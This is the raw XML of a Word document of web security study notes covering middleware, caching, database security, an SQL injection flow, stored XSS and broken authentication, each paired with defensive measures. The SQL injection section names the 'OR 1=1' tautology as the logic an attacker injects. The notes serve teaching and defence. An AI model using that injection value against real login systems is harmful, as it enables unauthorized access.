          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C56DAFB" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>OAuth / JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B8A00" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>API gateways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A1264" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Strict schema validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF071DA" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="70811D4F">
          <v:rect id="_x0000_i1152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C84C6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4. Middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8E6BD5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Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CBA44A" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Auth checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376AA9E3" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12043ED0" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Request modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA60C4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Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058F29AE" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Bypass if misconfigured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603EAFF5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FF1293C" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Least privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C7DDD4" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Secure order of execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B95F199" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="244E47B4">
          <v:rect id="_x0000_i1153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32623D6B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5. Caching (Redis / Memcached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB0C9B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Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F953C" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Performance boost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D139C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Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43362854" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Cache poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB6047F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Sensitive data exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D737C7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F83BD9C" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Authenticated access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0DEE39" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Avoid storing secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78F7C5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="6A217C5C">
          <v:rect id="_x0000_i1154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C60C18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6. Database Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCAD227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lastRenderedPageBreak/>
        <w:t>Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED0F6B" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2075290E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Weak credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B4C5DE" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Data exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717AFF0" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22C55F4F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E61A5E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>RBAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E3241" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Encryption at rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302AEAF7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="21ACC990">
          <v:rect id="_x0000_i1155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7984C93D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SQL Injection – Attack Flow Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76291C3F" w14:textId="30B400F2" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CBD619D" wp14:editId="66178E1E">
            <wp:extent cx="5715000" cy="4381500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10534551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D9D17" w14:textId="0DBFFC78" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451"/>
    <w:p w14:paraId="4AF04D1A" w14:textId="3D869CAB" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0553F715" wp14:editId="24ADE067">
            <wp:extent cx="2141220" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5400815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ABECD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Step-by-Step Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006AEF1" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>User input directly added to SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B721FC1" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Attacker injects logic (OR 1=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438FE8A" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Database executes attacker logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989BC4A" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Authentication bypassed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740939A6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Secure Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F57C2F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9D9B0" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>ORM usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310FAC6" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Input sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13872A38" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451"/>
    <w:p w14:paraId="7E11DE86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Cross-Site Scripting (XSS) – Server Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92C081" w14:textId="2B8792CC" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23DC29ED" wp14:editId="221C1CBF">
            <wp:extent cx="5731510" cy="3823335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2301199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FD83A" w14:textId="3E74D577" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="504126EA" wp14:editId="59EEEFDD">
            <wp:extent cx="5731510" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10079028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6E7DC" w14:textId="6738BAC2" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E7EB33A" wp14:editId="7F1BC3F0">
            <wp:extent cx="2766060" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1508481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C501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Stored XSS Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447884A" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Attacker submits malicious input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474438F4" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Server stores it without validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49B9B7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Victim loads page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66697C" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Browser executes attacker script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E9A93D" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="200E7848" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Output encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66292404" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5357A0B1" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Input sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC8E13" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="0DAE9835">
          <v:rect id="_x0000_i1192" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A35EB2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Broken Authentication &amp; Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74ACCE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Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40162205" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Credential stuffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C23E2B9" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Predictable session IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BDA2ED" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>No MFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120687E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68960F6F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Multi-Factor Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB0424" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Secure random session tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703ACBB7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Session expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6283D" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="78E79D9A">
          <v:rect id="_x0000_i1203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73627044" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs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571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="4556F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9E52E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049745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959CE95" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="2DD07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BBB1" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A223824" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Sandbox, SOP, CSP, HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="27CC2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47B5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CD4B90E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Validation, Auth, Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="6760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6D0E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451"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4D4B9358" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Parameterized queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497451" w:rsidRPr="00497451" w14:paraId="5CA12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5621" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D2234E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t>Auth + Rate limits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5203C943" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451"/>
    <w:p w14:paraId="1D696561" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451"/>
    <w:sectPr w:rsidR="00497451" w:rsidSect="00073FAE">
      <w:footerReference w:type="defaul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10E11" w14:textId="77777777" w:rsidR="008B63F3" w:rsidRDefault="008B63F3" w:rsidP="00073FAE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
